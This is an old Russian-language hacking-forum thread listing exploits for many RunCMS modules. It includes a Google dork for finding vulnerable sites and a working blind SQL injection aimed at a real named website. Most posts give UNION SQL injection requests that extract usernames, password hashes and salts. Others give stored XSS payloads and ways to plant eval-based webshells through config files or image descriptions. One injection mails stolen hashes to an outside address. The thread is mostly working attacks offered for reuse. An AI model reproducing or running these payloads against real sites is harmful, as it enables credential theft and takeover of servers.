Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
16.12.2008, 01:17
|
|
Members of Antichat - Level 5
Регистрация: 23.08.2007
Сообщений: 417
Провел на форуме:
14324684
Репутация:
3908
|
|
RunCMS Module eBlog 0.1 Blind-SQL
Уязвимый продукт: Module eBlog
Версия: <= 0.1
Линк: http://www.runcms.ru/modules/files/showfile.php?lid=165
Дорк: "inurl:modules/eblog/"
Blind-SQL
Уязвимость в файле index.php.
Уязвимый кусок кода:
PHP код:
$result = $db->query("select cat_blogid from ".$db->prefix(eblog_cat)." where cat_id=$cat") or $eh->show("0013");
Exploit:
Код:
true: /modules/eblog/index.php?cat=1+and+1=1
false: /modules/eblog/index.php?cat=1+and+1=2
Example:
Код:
true: http://utahvalleyonline.com/ourplace/modules/eblog/index.php?cat=12+and+substring(version(),1,1)=5
false: http://utahvalleyonline.com/ourplace/modules/eblog/index.php?cat=12+and+substring(version(),1,1)=4
__________________
Feci, quod potui. Faciant meliora potentes.
|
|
|
Уязвимости модулей RunCMS |
19.02.2009, 08:52
|
|
Members of Antichat - Level 5
Регистрация: 01.04.2007
Сообщений: 1,268
Провел на форуме:
10046345
Репутация:
4589
|
|
Уязвимости модулей RunCMS
XtremGuestbook
Версия: 1.2
Скачать: http://www.runcms.ru/modules/files/visit.php?lid=194
SQL-INJ
Уязвимый скрипт: /modules/xtremuserguestbook/index1.php
Запрос: /modules/xtremuserguestbook/index1.php?gbid= 2&op=Messageedit&idmsg=-1+union+select+1,uname,pwdsalt,pass,5,6,7+from+run cms_users
Параметр gbid - айди текушего юзера
Уязвимый кусок кода:
Не знаю, что это за стеб, видимо тут должна была быть проверка на административные права, но получилось вот так ..
PHP код:
$gbid = intval($HTTP_GET_VARS['gbid']);
if ($gbid != $xoopsUser->uid()) {
redirect_header(XOOPS_URL."/",3,_NOPERM);
}
PHP код:
switch($op) {
case "Messageedit":
Messageedit($HTTP_GET_VARS["idmsg"]);
break;
PHP код:
function Messageedit($idmsg) {
global $db, $xoopsModule, $myts, $gbid;
$result=$db->query("SELECT user_id,uname,url,email,title,message,note FROM ".$db->prefix("xtremuserguestbook")." WHERE xtremuserguestbook_id=$idmsg");
Так же можно удалять \ редактировать \ etc сообщения
Активная XSS
Уязвимо поле E-mail
mymail@asdasd.ru'><script>alert()</script><'
Заливка шелла через конфиг
Зависимость: на папку /modules/xtremuserguestbook/cache должны стоять 777 чмоды (я к примеру забыл их поставить))
Уязвимый скрипт: /modules/xtremuserguestbook/conf.php
Запрос: /modules/xtremuserguestbook/conf.php?gbid= 2&op=Config
Заюзаем поле _XTUG_NBMSGBYPAGE - 10;eval($_GET[a]);//
и сохраняем настройки, они сохранятся в cache/ 2.php
где 2 - наш айди
Уязвимый кусок кода:
Так же, как и в случае со скулей, идет не понятная проверка
PHP код:
$gbid = intval($HTTP_GET_VARS['gbid']);
if ($gbid != $xoopsUser->uid()) {
redirect_header(XOOPS_URL."/",3,_NOPERM);
}
PHP код:
function SaveConfig($unbmessage,$uallowbbcode,$uallowhtml,$uallowsmileys,$usendmail2webmaster,$umoderate,$ushowdisclaimer,$ushowlogo) {
global $db, $myts, $HTTP_POST_VARS, $gbid;
$fp=fopen("cache/".$gbid.".php","w");
fwrite($fp,'<?php
$uallowbbcode='.$uallowbbcode.';
$uallowhtml='.$uallowhtml.';
$uallowsmileys='.$uallowsmileys.';
$unbmsgbypage='.$unbmessage.';
$usendmail2webmaster='.$usendmail2webmaster.';
$umoderate='.$umoderate.';
$ushowdisclaimer='.$ushowdisclaimer.';
$ushowlogo='.$ushowlogo.';
?>');
fclose($fp);
redirect_header("index.php", 1, _UPDATED);
exit();
}
switch($op) {
case "Config":
Config();
break;
case "SaveConfig":
SaveConfig($nbmessage,$HTTP_POST_VARS["allowbbcode"],$HTTP_POST_VARS["allowhtml"],$HTTP_POST_VARS["allowsmileys"],$HTTP_POST_VARS["sendmail2webmaster"],$HTTP_POST_VARS["moderate"],$HTTP_POST_VARS["showdisclaimer"],$HTTP_POST_VARS["showlogo"]);
break;
}
"Конфиг" после запроса будет выглядеть примерно вот так:
PHP код:
<?php
$uallowbbcode=0;
$uallowhtml=0;
$uallowsmileys=0;
$unbmsgbypage=10;eval($_GET[a]);//;
$usendmail2webmaster=0;
$umoderate=0;
$ushowdisclaimer=0;
$ushowlogo=0;
?>
|
|
|
|
21.02.2009, 05:32
|
|
Members of Antichat - Level 5
Регистрация: 01.04.2007
Сообщений: 1,268
Провел на форуме:
10046345
Репутация:
4589
|
|
MyAnnonces
Версия: 1.7
Скачать: http://www.runcms.ru/modules/files/visit.php?lid=94
SQL-INJ
Уязвимый скрипт: addannonces.php
Запрос: /modules/MyAnnonces/addannonces.php?op=addindex&cid=-1+union+select+pass,2+from+runcms_users
Вместо pass поочереди подставляем uname, pwdsalt, т.к. concat заюзать не получится - срабатывает мегахаксорная зашита)
Уязвимый кусок кода:
Уязвимость можно проэксплуатировать только, если есть хоть 1 категория.
PHP код:
switch($op) {
case "addindex":
addindex($cid);
break;
PHP код:
function addindex($cid) {
..............
list($numrows) = $db->fetch_row($db->query("select cid, title from ".$db->prefix("ann_categories").""));
if ($numrows>0) {
..............
$requete = $db->query("select title, affprix from ".$db->prefix("ann_categories")." where cid=".$cid."");
list($title, $affprix) = $db->fetch_row($requete);
SQL-INJ
Уязвимый скрипт: annonces-p-f.php
Зависимость: magic_quotes = off
Запрос: /modules/MyAnnonces/annonces-p-f.php?op=EnvAnn&lid='+union+select+uname,pwdsalt,p ass+from+runcms_users%23
Уязивмый кусок кода:
PHP код:
switch($op) {
case "EnvAnn":
EnvAnn($lid);
break;
...........
function EnvAnn($lid) {
...........
$result = $db->query("SELECT lid, title, type FROM ".$db->prefix("ann_annonces")." where lid='$lid'");
list($lid, $title, $type) = $db->fetch_row($result);
echo "<B><A HREF=\"index.php\">"._CLA_MAIN."</A> » "._CLA_SENDTO." $lid \"<B>$type : $title</B>\"
Запрос: /modules/MyAnnonces/annonces-p-f.php?op=MailAnn&yname=&ymail=&fname=&fmail= blacksun@xakep.ru&lid=-1+union+select+1,pass,uname,pwdsalt,5,6,7,8,9,10,1 1,12,13+from+runcms_users
На указанный email придет письмо вида
Код:
Hello ,
thought that this advert might interest you and wanted to send it to you.
admin : dd94709528bb1c83d08f3088d4043f4742891f4f
153a
Price : 6 Ђ 7
Email address : http://localhost/runcms/modules/MyAnnonces/contact.php?lid=1
Telephone : 5
Town : 11
Country : 12
Other adverts are available in teh Classified Adverts section of Mysite
http://{SITE URL}/modules/MyAnnonces/
Уязвимый кусок кода:
PHP код:
switch($op) {
case "MailAnn":
MailAnn($lid, $yname, $ymail, $fname, $fmail);
break;
............
function MailAnn($lid, $yname, $ymail, $fname, $fmail) {
global $xoopsConfig, $xoopsUser, $db, $monnaie, $ynprice, $myts, $meta;
$result = $db->query("SELECT lid, title, type, description, tel, price, typeprix, date, email, submitter, town, country, photo FROM ".$db->prefix("ann_annonces")." where lid=$lid");
Можно обойтись и без отсылки на мыло)
Запрос: /modules/MyAnnonces/annonces-p-f.php?op=ImprAnn&lid=-1+union+select+1,pass,uname,pwdsalt,5,6,7,8,9,10,1 1,12,13+from+runcms_users
Уязвимый кусок кода:
PHP код:
switch($op) {
case "ImprAnn":
ImprAnn($lid);
break;
..............
function ImprAnn($lid) {
global $xoopsConfig, $db, $monnaie, $useroffset, $claday, $ynprice, $myts, $meta;
$currenttheme = getTheme();
$result = $db->query("SELECT lid, title, type, description, tel, price, typeprix, date, email, submitter, town, country, photo FROM ".$db->prefix("ann_annonces")." where lid=$lid");
Флуд именами\паролями\явками своего \ чужого мыла
Уязвимый скрипт: contact.php
Зависимость: magic_quotes = off
Запрос: /modules/MyAnnonces/contact.php?submit=1&id=-1'+union+select+' blacksun@xakep.ru',2,pass,uname,pwdsalt+from+runcms_users%23
Уязвимый кусок кода:
PHP код:
if ($submit) {
include("header.php");
global $xoopsConfig, $db, $myts, $meta;
$result = $db->query("SELECT email, submitter, title, type, description FROM ".$db->prefix("ann_annonces")." WHERE lid = '$id'");
while(list($email, $submitter, $titre, $type, $description) = $db->fetch_row($result)) {
И на этом мне надоело, скриптов в этом модуле еще достаточно и все дырявые .. кто хочет - может добить.
Последний раз редактировалось BlackSun; 23.02.2009 в 13:06..
|
|
|
|
21.02.2009, 06:25
|
|
Members of Antichat - Level 5
Регистрация: 01.04.2007
Сообщений: 1,268
Провел на форуме:
10046345
Репутация:
4589
|
|
BamaGalerie
Версия: 3.0.1
Скачать: http://www.runcms.ru/modules/files/visit.php?lid=282
Раскрытие путей
/modules/bamagalerie3/makegoback.php?galerieConfig[page_type]=bama_page
/modules/bamagalerie3/navig_cat_show.php
/modules/bamagalerie3/include/copy_one_img.php?galerieConfig[page_type]=bama_page
^ а так же половина скриптов с той же папки (include)
SQL-INJ
Уязвимый скрипт: rateimg.php
Запрос: /modules/bamagalerie3/rateimg.php?id=-1+union+select+pass+from+runcms_users
Уязвимый кусок кода:
PHP код:
if($HTTP_POST_VARS['submit']) {
.........
} else {
$result=$db->query("select titre from ".$db->prefix("bamagalerie3_img")." where id=$id");
------------------------------------------
MiniGal
Версия: 0.51
Скачать: http://www.runcms.ru/modules/files/visit.php?lid=491
Активная XSS
Добавить коментарий > уязвимо поле name: <script>alert()</script>
Заливка шелла с админки модуля -
Заливаем картинку, затем редактируем Description: <?eval($_GET[a]);?>
Шелл будет в файле mg2db_idatabase.php
Последний раз редактировалось BlackSun; 21.02.2009 в 06:51..
|
|
|
|
21.02.2009, 12:27
|
|
Members of Antichat - Level 5
Регистрация: 01.04.2007
Сообщений: 1,268
Провел на форуме:
10046345
Репутация:
4589
|
|
RushteR> BlackSun: ты в runcms в модуле myalbum не копался ?
MyAlbum
Версия: 1.0
Скачать: http://www.runcms.ru/modules/files/visit.php?lid=302
SQL-INJ
Уязвимый скрипт: newcomment.php
Запрос: /modules/myalbum/newcomment.php?item_id=-1+union+select+pass+from+runcms_users%23
Уязвимый кусок кода:
Фактически целиком весь файл
PHP код:
$q = "select l.title from ".$db->prefix("myalbum_photos")." l, ".$db->prefix("myalbum_text")." t where l.lid=$item_id and l.lid=t.lid and status>0";
$result=$db->query($q);
list($ltitle)=$db->fetch_row($result);
$subject = $ltitle;
Уязвимый скрипт: photo.php
(Скулю не добил, у меня какие то проблемы с модулем ..)
Запрос: /modules/myalbum/photo.php?lid=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13%23
Уязвимый кусок кода:
PHP код:
$q = "select l.lid, l.cid, l.title, l.ext, l.res_x, l.res_y, l.status, l.date, l.hits, l.rating, l.votes, l.comments, t.description from ".$db->prefix("myalbum_photos")." l, ".$db->prefix("myalbum_text")." t where l.lid=$lid and l.lid=t.lid and status>0";
$result=$db->query($q);
list($lid, $cid, $ltitle, $ext, $res_x, $res_y, $status, $time, $hits, $rating, $votes, $comments, $description)=$db->fetch_row($result);
Уязвимый скрипт: ratephoto.php
Запрос: /modules/myalbum/ratephoto.php?lid=-1+union+select+pass+from+runcms_users
Уязвимый кусок кода:
PHP код:
if($HTTP_POST_VARS['submit']) {
...............
} else {
..............
$result=$db->query("select title from ".$db->prefix("myalbum_photos")." where lid=$lid");
list($title) = $db->fetch_row($result);
Еще одна не добитая скуля, видимо из за корявой установки модуля ..
Уязвимый скрипт: viewcat.php
Запрос: /modules/myalbum/viewcat.php?cid=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12%23
Уязвимый кусок кода:
PHP код:
$fullcountresult=$db->query("select count(*) from ".$db->prefix("myalbum_photos")." where cid=$cid and status>0");
list($numrows) = $db->fetch_row($fullcountresult);
if($numrows>0){
$q = "select l.lid, l.title, l.ext, l.res_x, l.res_y, l.status, l.date, l.hits, l.rating, l.votes, l.comments, t.description from ".$db->prefix("myalbum_photos")." l, ".$db->prefix("myalbum_text")." t where cid=$cid and l.lid=t.lid and status>0 order by $orderby";
$result=$db->query($q,$show,$min);
|
|
|
|
23.02.2009, 11:22
|
|
Members of Antichat - Level 5
Регистрация: 01.04.2007
Сообщений: 1,268
Провел на форуме:
10046345
Репутация:
4589
|
|
eBlog
Версия: 0.3
Заходим, создаем свой блог, добавляем запись ..
Уязвимый скрипт: blogentry.php
Запрос: blogentry.php?op=edit&text_id=-1+union+select+ 1,pass,pwdsalt,4+from+runcms_users+limit+0,1
Где выделенная еденица - айди вашего блога
Уязвимый кусок кода:
PHP код:
if ($op == 'edit')
{
list($b_id, $title, $txt, $dt) = $db->fetch_row($db->query("select text_blogid, text_title, text_text, text_date from ".
$db->prefix("eblog_text")." where text_id=$text_id"));
if (!isSet($b_id) || $b_id != $blog_id)
{
echo $blog_id;
return;
}
if (!isSet($cats))
{
$result = $db->query("select tc_catid from ".$db->prefix("eblog_text_cat")." where tc_textid=$text_id");
$cats = array();
while ($myrow = $db->fetch_array($result)) { $cats += array($myrow['tc_catid']); }
}
eBlogMenu(array("index.php?blog_id=1" => _EBLOG_MY_BLOG,
"blogentry.php?op=add" => _EBLOG_ADD_ENTRY,
"blogadmin.php?op=edit" => _EBLOG_ADMIN,
"index.php?blog_id=-1" => _EBLOG_CHOOSE_BLOG,
"index.php" => _EBLOG_ALL_LATEST
)
);
showForm(_EBLOG_EDIT_ENTRY, $title, $txt, $all_cats, $cats, $text_id, "");
return;
}
Активная XSS
Уязвимо поле имя блога
|
|
|
|
23.02.2009, 12:11
|
|
Members of Antichat - Level 5
Регистрация: 01.04.2007
Сообщений: 1,268
Провел на форуме:
10046345
Репутация:
4589
|
|
Event Calendar
Версия: 2.4
Уязвимый скрипт: display.php
Запрос: /modules/ecal/display.php?year1=&month1=&day1=&katid=-1+union+select+pass,2+from+runcms_users
Уязвимый кусок кода:
PHP код:
if ($katid) {
$abfrage =" stamp >= \"$year1-$month1-$day1 00:00:00\" AND cid=$katid AND valid ='yes'";
$kat1 = $db->query("SELECT title, cid FROM ".$db->prefix("ecal_cat")." where cid=$katid");
list($kattitle) = $db->fetch_row($kat1);
Уязвимый скрипт: localleve.php
Запрос: /modules/ecal/localleve.php?lid=-1+union+select+pass+from+runcms_users%23
Уязвимый кусок кода:
PHP код:
$kat1 = $db->query("SELECT location FROM ".$db->prefix("ecal_location")." where lid=$lid");
list($loctitle) = $db->fetch_row($kat1);
Уязвимый скрипт: location.php
Запрос: /modules/ecal/location.php?lid=-1+union+select+1,2,3,uname,5,pass,pwdsalt,8,9,10,1 1+from+runcms_users
Уязвимый кусок кода:
PHP код:
$lid = $HTTP_GET_VARS['lid'];
$locat = $db->query("SELECT * FROM ".$db->prefix("ecal_location")." where lid=".$lid);
$location = $db->fetch_array($locat);
Уязвимый скрипт: modifevent.php
Зависимость: magic_quotes = off
Запрос: /modules/ecal/modifevent.php?id=-1'+union+select+1,2,uname,4,5,6,pass,pwdsalt,9,10, 11,12,13,14+from+runcms_users%23
Уязвимый кусок кода:
PHP код:
$query = $db->query("SELECT * FROM ".$db->prefix("ecal")." WHERE id = '$id' AND valid='yes'");
$row = $db->fetch_array($query);
Уязвимый скрипт: remind.php
Запрос: /modules/ecal/remind.php?op=remindadd&id=-1+union+select+1,2,3,4,5,6,pass,8,9,10,11,12,13,14 +from+runcms_users
Уязвимый кусок кода:
PHP код:
$tid = $HTTP_GET_VARS['id'];
.......
$query = $db->query("SELECT * FROM ".$db->prefix("ecal")." WHERE id = $tid");
$row = $db->fetch_array($query);
Уязвимый скрипт: teilnehmen.php
Запрос: /modules/ecal/teilnehmen.php?op=teiladd&id=-1+union+select+1,2,3,4,5,6,pass,8,9,10,11,12,13,14 +from+runcms_users
Уязвимый кусок кода:
PHP код:
$tid = $HTTP_GET_VARS['id'];
.......
$query = $db->query("SELECT * FROM ".$db->prefix("ecal")." WHERE id = $tid");
$row = $db->fetch_array($query);
Последний раз редактировалось BlackSun; 23.02.2009 в 13:05..
|
|
|
|
23.02.2009, 13:04
|
|
Members of Antichat - Level 5
Регистрация: 01.04.2007
Сообщений: 1,268
Провел на форуме:
10046345
Репутация:
4589
|
|
Friendfinder
Версия: 3.02
Уязвимый скрипт: search.php
Запрос: /modules/friendfinder/search.php?page=search&search=search&agefrom=77&ag etill=19+union+select+1,uname,pwdsalt,4,0x31322e31 322e31393939,pass+from+runcms_users%23&sex=&partne r=&state=&category=&sort=
Уязвимый кусок кода:
PHP код:
if ($page == search) {
if ($search == search) {
/************************/
$g="SUBSTRING(birth,7)";
$m="SUBSTRING(birth,4,2)";
$d="LEFT(birth,2)";
$dat="CONCAT($g,'.',$m,'.',$d)";
/************************/
$sql = "SELECT id,user, city, state, birth, title FROM ".$db->prefix("friendfinder")."
inner join ".$db->prefix("friendfinder_state")."
on state = cid
WHERE (DATE_FORMAT(FROM_DAYS(TO_DAYS(NOW())-TO_DAYS($dat)), '%Y')+0) BETWEEN $agefrom AND $agetill AND partner='$sex' AND sex='$partner' AND state='$state' AND active='1' AND category='$category' ORDER BY '$sort'";
} else {
echo ""._TEXTSEARCHUNSUCCESSFUL."";
}
echo "<table border=0 cellpadding=5 cellspacing=0 align=center width=550><tr><td><font face=arial size=2>"._UNAME."</td><br><td><font face=arial size=2>"._TEXTREGION."</td><td><font face=arial size=2>"._CITY."</td><td><font face=arial size=2>"._TEXTAGE."</td></tr>";
$result = $db->query($sql);
while (list($id,$user,$city,$state,$birth,$title ) = $db->fetch_row($result))
{
Уязвимый скрипт: view.php
Зависимость: magic_quotes = off
Запрос: /modules/friendfinder/view.php?id=-1'+union+select+1,uname,3,4,5,pass,7,8,9,pwdsalt,1 1,12,13,14,0x31322e31322e31393939,16,17,19,20,21,2 2+from+runcms_users%23
Уязвимый кусок кода:
PHP код:
if (isset($id) || $id != "")
{
$view = $db->query("SELECT id,user,active,sex,category,name,email,city,state,country,hobby,partner,height,weight,birth,pic,Description,imgname,imgtime,date, title FROM ".$db->prefix("friendfinder")."
inner join ".$db->prefix("friendfinder_state")." on state = cid WHERE id = '$id'");
while (list($id,$user,$active,$sex,$category,$name,$email,$city,$state,$country,$hobby,$partner,$height,$weight,$birth,$pic,$Description,$imgname,$imgtime,$date,$title ) = $db->fetch_row($view)) {
|
|
|
|
24.02.2009, 10:26
|
|
Members of Antichat - Level 5
Регистрация: 01.04.2007
Сообщений: 1,268
Провел на форуме:
10046345
Репутация:
4589
|
|
googlestats
Версия: 2
Уязвимый скрипт: info-robot.php
Запрос: /modules/googlestats/info-robot.php?robot=-1+union+select+1,2,pass,pwdsalt,5,uname,7,8,9,10+f rom+runcms_users
Уязвимый кусок кода:
PHP код:
$descr = "descr_".$LANGUE;
$sql = "SELECT *";
$sql .= " FROM ".$TABLE_ROBOTS;
$sql .= " WHERE id=".$robot;
$res = mysql_query($sql) or erreurServeurMySQL($sql);
if ($enr = mysql_fetch_array($res))
Уязвимый скрипт: index.php
Запрос: /modules/googlestats/index.php?rub=&robot=-1+union+select+pass+from+runcms_users%23&s=06&d=20 090202
Уязвимый кусок кода:
PHP код:
// index.php
if ( (getVar('rub') == 'bilan') || ($rub == '') )
{
bilan();
}
// ---------------------------------------------------------------------------
// rubrique PAGES
// ---------------------------------------------------------------------------
else if (getVar('rub') == 'pages')
{
pages();
}
............
// lib.php
// contenu
afficherPages($robot);
...........
// function afficherPages()
$sql = "SELECT url, max(date) AS 'lastdate', count(id) AS 'occurrence', ip, dns";
$sql .= " FROM ".$db->prefix("gs_log");
$sql .= " WHERE ".$sql_date;
$sql .= " AND robot=".$robot;
$sql .= " GROUP BY url";
$sql .= " ORDER BY ".$tri;
$res = mysql_query($sql) or erreurServeurMySQL($sql);
if (mysql_num_rows($res) == 0)
|
|
|
|
25.02.2009, 06:17
|
|
Members of Antichat - Level 5
Регистрация: 01.04.2007
Сообщений: 1,268
Провел на форуме:
10046345
Репутация:
4589
|
|
HotNews
Версия: 2
Уязвимый скрипт: rate.php
Запрос: /modules/HotNews/rate.php?tid=-1+union+select+1,pass+from+runcms_users
Уязвимый кусок кода:
PHP код:
if($HTTP_POST_VARS['submit']) {
........
} else {
include(XOOPS_ROOT_PATH."/header.php");
OpenTable();
$result=$db->query("SELECT cid, tname FROM ".$db->prefix("HotNews")." WHERE tid=$tid");
list($cid, $tname) = $db->fetch_row($result);
Уязвимый скрипт: index.php
Запрос: /modules/HotNews/?op=viewexttutorial&tid=-1+union+select+pass+from+runcms_users
Уязвимый кусок кода:
PHP код:
switch($op) {
case "viewexttutorial":
viewexttutorial();
break;
...........
function viewexttutorial() {
global $db, $xoopsTheme, $HTTP_GET_VARS, $framebrowse;
include(XOOPS_ROOT_PATH."/header.php");
$tid = $HTTP_GET_VARS['tid'];
$db->query("update ".$db->prefix("HotNews")." set hits=hits+1 where tid=$tid ");
OpenTable();
$result = $db->query("select tlink from ".$db->prefix("HotNews")." where tid=$tid ");
list($tlink) = $db->fetch_row($result);
Уязвимый скрипт: index.php
Запрос: /modules/HotNews/?op=viewtutorial&tid=-1+union+select+1,2,uname,4,pass,6,7,8,9+from+runcm s_users
Уязвимый кусок кода:
PHP код:
case "viewtutorial":
viewtutorial();
break;
...........
function viewtutorial() {
global $xoopsConfig, $xoopsUser, $db, $xoopsTheme, $HTTP_GET_VARS, $myts, $content_visdefault, $content_default, $content_visualize, $imgwidth, $imgheight, $framebrowse;
include(XOOPS_ROOT_PATH."/header.php");
$tid = $HTTP_GET_VARS['tid'];
if ($HTTP_GET_VARS['page']) {
$page = $HTTP_GET_VARS['page'];
} else {
$db->query("update ".$db->prefix("HotNews")." set hits=hits+1 where tid=$tid ");
}
OpenTable();
$result = $db->query("select tid, cid, tname, timg, tcont, tauthor, codes, hits, submitter from ".$db->prefix("HotNews")." where tid=$tid ");
list($tid, $cid, $tname, $timg, $tcont, $tauthor, $codes, $hits, $submitter) = $db->fetch_row($result);
Уязвимый скрипт: index.php
Запрос: /modules/HotNews/?op=listHotNews&cid=-1+union+select+1,pass,3+from+runcms_users
Уязвимый кусок кода:
PHP код:
case "listHotNews":
listHotNews();
break;
........
function listHotNews() {
global $xoopsConfig, $xoopsUser, $db, $xoopsTheme, $myts, $category_visdefault, $category_visualize, $category_default, $columnset, $imgwidth, $imgheight;
global $tutorial_visdefault, $tutorial_visualize, $tutorial_default, $HTTP_GET_VARS, $framebrowse;
include(XOOPS_ROOT_PATH."/header.php");
$cid = $HTTP_GET_VARS['cid'];
$xcid = $cid;
OpenTable();
$result = $db->query("select scid, cname, cimg from ".$db->prefix("HotNews_categorys")." where cid=$cid");
list($scid, $cname, $cimg) = $db->fetch_row($result);
Уязвимый скрипт: index.php
Запрос: /modules/HotNews/?op=printpage&tid=-1+union+select+1,2,pass,4+from+runcms_users
Уязвимый кусок кода:
PHP код:
case "printpage":
PrintTutPage();
break;
..........
function PrintTutPage() {
global $xoopsConfig, $xoopsUser, $db, $myts, $HTTP_GET_VARS, $imgwidth, $imgheight;
$tid = $HTTP_GET_VARS['tid'];
$result=$db->query("select tname, timg, tcont, codes from ".$db->prefix("HotNews")." where tid=$tid");
list($tname, $timg, $tcont, $codes) = $db->fetch_row($result);
Уязвимый скрипт: submit.php
Запрос: /modules/HotNews/submit.php?op=addTutorial&cid=-1+union+select+1,uname,pass,4+from+runcms_users
Уязвимый кусок кода:
PHP код:
case "addTutorial":
addTutorial();
break;
.........
function addTutorial(){
global $db, $xoopsConfig, $xoopsUser, $HTTP_GET_VARS, $myts, $xoopsTheme;
include(XOOPS_ROOT_PATH."/header.php");
$cid = $HTTP_GET_VARS["cid"];
$createdir = $HTTP_GET_VARS["createdir"];
// Add new Tutorial ------------------//
$result=$db->query("select scid, cname, cdesc, cimg from ".$db->prefix("HotNews_categorys")." where cid=$cid");
list($scid,$cname,$cdesc,$cimg) = $db->fetch_row($result);
Заливка шелла
Уязвимый скрипт: upload.php
Скрипт не проверяет типа файла \ расширение поэтому возможно можно залить шелл в папку images, либо в любую другую, передав соотвествующий путь в переменной img_path
( Хотя у меня на локале не заливались даже картинки, поэтому проверить не смог .. впрочем, если расширение и проверяется, то можно залить шелл с раширением .jpg, но img_path=/shell.php%00 )
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
